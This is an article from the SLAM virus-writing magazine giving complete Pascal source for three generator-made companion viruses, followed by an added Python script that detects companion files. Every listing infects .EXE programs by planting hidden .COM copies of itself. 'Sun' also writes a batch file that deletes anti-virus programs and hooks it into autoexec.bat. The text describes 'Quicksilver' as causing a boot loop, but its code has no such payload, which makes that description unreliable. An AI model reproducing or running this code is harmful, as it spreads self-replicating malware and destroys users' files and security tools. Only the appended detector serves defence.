SLAM3.011: LoNIG Viruses Sun, Environment and Quicksilver (sources)
Examples of virii generated with LoNIG:
1. PAS.Environment
It is a harmless Companion virus that shows a warning messy about our environment.
I took this as a chance to give this warning to all reading the SLAM mag. Actually, there is no other payload ==> good for testing a PAS virus.
====cut here=================================================================
{-------------------- This virus was created by LoNVG ------------------------ }
{Lord of nAvAn's VIRII GENERATOR was written 4 educational purposes only ! }
{Having this auto-generated virus on your computer you accept that YOU (--> }
{and ONLY you) are responsible for your actions with that virus!!!If you do }
{NOT accept this you must delete it. But anyway, don't yell at *me* if your }
{philes are damaged. Actually, I'm NOT responsible for ANY troubles caused }
{by LoNVG!}
{----------------------------------------------------------------------------- }
Program environment;
Uses Dos,Crt;
{$M 59999,0,8000}
Var Inf,Inf2:Searchrec; {Used in the EXE and phile_exist routines }
Infected:Boolean; {Is a phile infected? }
Params:Byte; {Loop Index for adding all parameters together }
All_Parameters:String; {This string contains the whole list of parameters
originally passed to the program }
P:PathStr; {Used}
D:DirStr; {in}
N:NameStr; {the}
E:ExtStr; {FSplit procedure.}
Procedure Check_Infected(Path:String);
Begin
FSplit(Inf.Name,D,N,E);
FindFirst(Path+N+'.COM',Anyfile,Inf2);
Infected:=(DosError=0);
End;
Procedure CopyFile(SourceFile, TargetFile:string);
var
Source,
Target : file;
BRead,
Bwrite : word;
FileBuf : array[1..2048] of char;
Begin
Assign(Source,SourceFile);
SetFattr(Source,$20); {Set the phile attributes of the}
{hidden COM companion we're going}
{to be copying to archive so that}
{it's possible to read it. }
{$I-}
Reset(Source,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the source phile! }
End;
Assign(Target,TargetFile);
{$I-}
Rewrite(Target,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the target phile! }
End;
Repeat
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
BlockWrite(Target,FileBuf,Bread,Bwrite);
Until (Bread = 0) or (Bread <> BWrite);
Close(Source);
Close(Target);
SetFattr(Source,3); {Set companion attribute to hidden}
SetFattr(Target,3);
End;{CopyFile}
Procedure Find_Infect(Path:String);
{Find and Infect!}
Begin
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
While DosError=0 Do Begin
Infected:=False;
Check_Infected(Path); { Check if the .EXE found is already infected. }
If Not Infected then Begin
CopyFile(ParamStr(0),Path+N+'.COM');
End;
FindNext(Inf);
End;
End;{Find_Infect}
Procedure display;
Var text:string;
Begin
Clrscr;
randomize;
textcolor(random(10)+2);
text:='The time is up!! We NOW MUST save our environment!!! Otherwise it''ll too late!';
writeln(text);
readln;
end;
{displays the text "The time is up!! We NOW MUST save our environment!!! Otherwise it'll too late!"}
{--------------------------------------------}
Begin
display;
Find_Infect('C:\DOS\');
Find_Infect('C:\MSDOS\');
Find_Infect('');
FSplit(ParamStr(0),D,N,E);
All_Parameters:=''; {Vars must be initialized}
For Params:=1 To ParamCount
do All_Parameters:=All_Parameters+ParamStr(Params)+' ';
Exec(D+N+'.EXE',All_Parameters); {Execute the phile that the user}
End.
====cut here=================================================================
2. PAS.Quicksilver
This guy fakes the autoexec.bat so that the boot process will get into an endless loop. I took this name since I like NJ's WM.Quicksilver very much!! Now the Pascal variant. I hope you don't mind, NJ! ;))
====cut here=================================================================
{-------------------- This virus was created by LoNVG ------------------------ }
{Lord of nAvAn's VIRII GENERATOR was written 4 educational purposes only ! }
{Having this auto-generated virus on your computer you accept that YOU (--> }
{and ONLY you) are responsible for your actions with that virus!!!If you do }
{NOT accept this you must delete it. But anyway, don't yell at *me* if your }
{philes are damaged. Actually, I'm NOT responsible for ANY troubles caused }
{by LoNVG!}
{----------------------------------------------------------------------------- }
Program quicksilver;
Uses Dos,Crt;
{$M 59999,0,8000}
Var Inf,Inf2:Searchrec; {Used in the EXE and phile_exist routines }
Infected:Boolean; {Is a phile infected? }
Params:Byte; {Loop Index for adding all parameters together }
All_Parameters:String; {This string contains the whole list of parameters
originally passed to the program }
P:PathStr; {Used}
D:DirStr; {in}
N:NameStr; {the}
E:ExtStr; {FSplit procedure.}
Procedure Check_Infected(Path:String);
Begin
FSplit(Inf.Name,D,N,E);
FindFirst(Path+N+'.COM',Anyfile,Inf2);
Infected:=(DosError=0);
End;
Procedure CopyFile(SourceFile, TargetFile:string);
var
Source,
Target : file;
BRead,
Bwrite : word;
FileBuf : array[1..2048] of char;
Begin
Assign(Source,SourceFile);
SetFattr(Source,$20); {Set the phile attributes of the}
{hidden COM companion we're going}
{to be copying to archive so that}
{it's possible to read it. }
{$I-}
Reset(Source,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the source phile! }
End;
Assign(Target,TargetFile);
{$I-}
Rewrite(Target,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the target phile! }
End;
Repeat
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
BlockWrite(Target,FileBuf,Bread,Bwrite);
Until (Bread = 0) or (Bread <> BWrite);
Close(Source);
Close(Target);
SetFattr(Source,3); {Set companion attribute to hidden}
SetFattr(Target,3);
End;{CopyFile}
Procedure Find_Infect(Path:String);
{Find and Infect!}
Begin
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
While DosError=0 Do Begin
Infected:=False;
Check_Infected(Path); { Check if the .EXE found is already infected. }
If Not Infected then Begin
CopyFile(ParamStr(0),Path+N+'.COM');
End;
FindNext(Inf);
End;
End;{Find_Infect}
{--------------------------------------------}
Begin
Find_Infect('C:\DOS\');
Find_Infect('C:\MSDOS\');
Find_Infect('');
FSplit(ParamStr(0),D,N,E);
All_Parameters:=''; {Vars must be initialized}
For Params:=1 To ParamCount
do All_Parameters:=All_Parameters+ParamStr(Params)+' ';
Exec(D+N+'.EXE',All_Parameters); {Execute the phile that the user}
End.
====cut here=================================================================
3. PAS.Sun
This caliber kills several AV progs which are available now. Even FWIN --> a good chance for you, NJ, to continue your macro viriis he he;)
====cut here=================================================================
{-------------------- This virus was created by LoNIG ------------------------ }
{Lord of nAvAn's INVASION GENERATOR was written 4 educational purposes only ! }
{Having this auto-generated virus on your computer you accept that YOU (--> }
{and ONLY you) are responsible for your actions with that virus!!!If you do }
{NOT accept this you must delete it. But anyway, don't yell at *me* if your }
{philes are damaged. Actually, I'm NOT responsible for ANY troubles caused }
{by LoNIG!}
{----------------------------------------------------------------------------- }
Program sun;
Uses Dos,Crt;
{$M 59999,0,8000}
Var Inf,Inf2:Searchrec; {Used in the EXE and phile_exist routines }
Infected:Boolean; {Is a phile infected? }
Params:Byte; {Loop Index for adding all parameters together }
All_Parameters:String; {This string contains the whole list of parameters
originally passed to the program }
P:PathStr; {Used}
D:DirStr; {in}
N:NameStr; {the}
E:ExtStr; {FSplit procedure.}
Procedure Check_Infected(Path:String);
Begin
FSplit(Inf.Name,D,N,E);
FindFirst(Path+N+'.COM',Anyfile,Inf2);
Infected:=(DosError=0);
End;
Procedure CopyFile(SourceFile, TargetFile:string);
var
Source,
Target : file;
BRead,
Bwrite : word;
FileBuf : array[1..2048] of char;
Begin
Assign(Source,SourceFile);
SetFattr(Source,$20); {Set the phile attributes of the}
{hidden COM companion we're going}
{to be copying to archive so that}
{it's possible to read it. }
{$I-}
Reset(Source,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the source phile! }
End;
Assign(Target,TargetFile);
{$I-}
Rewrite(Target,1);
{$I+}
If IOResult <> 0 then
Begin
Exit; {Couldn't open the target phile! }
End;
Repeat
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
BlockWrite(Target,FileBuf,Bread,Bwrite);
Until (Bread = 0) or (Bread <> BWrite);
Close(Source);
Close(Target);
SetFattr(Source,3); {Set companion attribute to hidden}
SetFattr(Target,3);
End;{CopyFile}
Procedure Find_Infect(Path:String);
{Find and Infect!}
Begin
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
While DosError=0 Do Begin
Infected:=False;
Check_Infected(Path); { Check if the .EXE found is already infected. }
If Not Infected then Begin
CopyFile(ParamStr(0),Path+N+'.COM');
End;
FindNext(Inf);
End;
End;{Find_Infect}
Procedure retro;
Var hb, autoexec:text;
Begin
assign(hb,'c:\ˇ.bat'); {now let's make the ASCII255.BAT}
rewrite(hb);
append(hb);
writeln(hb,'@echo off');
writeln(hb,'deltree /y anyFUTUREavPROG*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y antiv*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y av*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y fp*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y fprot*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y f-prot*.* ');
writeln(hb,'@echo off');
writeln(hb,'deltree /y scan*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y suspi*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y drsol*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y tbav*.*');
writeln(hb,'@echo off');
writeln(hb,'deltree /y mcaf*.*');
writeln(hb,'@echo off');
{A messy for the next boot process...}
writeln(hb,'echo No Av-PrOg WiLl ExIsT iN fUtUrE!!!');
writeln(hb,'echo Brought to you by the giant [SLAM] vx group');
writeln(hb,'pause');
close(hb);
assign(autoexec,'c:\autoexec.bat'); {prepare autoexec.bat...}
reset(autoexec);
append(autoexec);
writeln(autoexec,'ˇ');
close(autoexec);
end;
{--------------------------------------------}
Begin
retro;
Find_Infect('C:\DOS\');
Find_Infect('C:\MSDOS\');
Find_Infect('');
FSplit(ParamStr(0),D,N,E);
All_Parameters:=''; {Vars must be initialized}
For Params:=1 To ParamCount
do All_Parameters:=All_Parameters+ParamStr(Params)+' ';
Exec(D+N+'.EXE',All_Parameters); {Execute the phile that the user}
End.
====cut here=================================================================
Yeah, have fun with these examples and ALWAYS REMEMBER: Viriis are a form of ALIFE. Therefore handle them with care if you don't want a loss of data or whatever! ;)
Of course it's possible to generate virii that have no special payload except replication.
CU in the next mag
- Lord of nAvAn [SLAM] / Pascal vx guy
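
Added example, not part of the original article or of LoNIG: a defender-side check for the companion pattern the three listings share, where Find_Infect copies the running program to a .COM next to every .EXE that has none. It flags .COM files that shadow a same-named .EXE and counts byte-identical copies; the function names and the min_copies threshold are assumptions of this example.

```python
import hashlib
import os
import sys
from collections import defaultdict


def find_companions(root):
    """Return (com_path, exe_path, sha256, copies) for shadowing .COM files.

    A .COM "shadows" an .EXE when both share a directory and a base name;
    DOS resolves the bare name to the .COM first. `copies` is how many
    shadowing .COM files under `root` have exactly the same content.
    """
    pairs = []
    for dirpath, _dirs, files in os.walk(root):
        # DOS names are case-insensitive, so compare upper-cased stems.
        by_stem = defaultdict(dict)
        for name in files:
            stem, ext = os.path.splitext(name)
            by_stem[stem.upper()][ext.upper()] = os.path.join(dirpath, name)
        for exts in by_stem.values():
            if ".COM" in exts and ".EXE" in exts:
                with open(exts[".COM"], "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
                pairs.append((exts[".COM"], exts[".EXE"], digest))
    counts = defaultdict(int)
    for _com, _exe, digest in pairs:
        counts[digest] += 1
    return sorted((c, e, d, counts[d]) for c, e, d in pairs)


def suspicious(findings, min_copies=2):
    """Keep shadowing .COM files whose content repeats (assumed threshold).

    One COM/EXE pair can be legitimate; the same bytes shadowing several
    unrelated programs matches a companion that copies itself unchanged.
    """
    return [f for f in findings if f[3] >= min_copies]


if __name__ == "__main__":
    # Usage: point it at a mounted disk image or an extracted directory tree.
    for com, exe, digest, copies in suspicious(find_companions(sys.argv[1])):
        print(f"{com} shadows {exe} sha256={digest[:16]} copies={copies}")
```

On a mounted FAT image the hidden attribute the listings set on each copy is a further signal, but it is not visible through plain os.walk, so this check relies on name and content only.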